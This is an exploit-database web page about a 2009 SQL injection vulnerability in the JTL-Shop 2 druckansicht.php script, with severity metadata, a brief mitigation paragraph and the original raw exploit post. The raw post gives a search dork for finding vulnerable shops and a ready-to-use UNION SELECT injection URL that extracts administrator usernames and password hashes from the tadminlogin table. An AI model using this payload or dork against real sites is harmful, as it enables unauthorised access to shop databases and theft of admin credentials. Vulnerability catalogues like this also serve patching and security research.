header-logo
Suggest Exploit
vendor:
JTL-Shop 2
by:
Lo$T
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: JTL-Shop 2
Affected Version From: 2
Affected Version To: 2
Patch Exists: N/A
Related CWE: N/A
CPE: a:jtl-software:jtl-shop2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

JTL-Shop 2 (druckansicht.php) SQL Injection Vulnerability

A SQL injection vulnerability exists in JTL-Shop 2 druckansicht.php. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

JTL-Shop 2 (druckansicht.php) SQL Injection Vulnerability

author : Lo$T

(#) Home : www.sa-hacker.com/vb<http://www.sa-hacker.com/vb><http://www.sa-hacker.com/vb> + www.sec-eviles.com/vb<http://www.sec-eviles.com/vb>


email : H_CK@live.fr<mailto:H_CK@live.fr>


Dork :" Powered by JTL-Shop 2"

exp :

http://server/Path/druckansicht.php?s=13 and 1=2 union select 1,2,3,4,5,concat(cName,0x3a,cPass),7,8,9 from tadminlogin--
Greetz TO :beloved560 + The S3r!0uS + SMDo

Navigation

Suggest Exploit

Services By CQR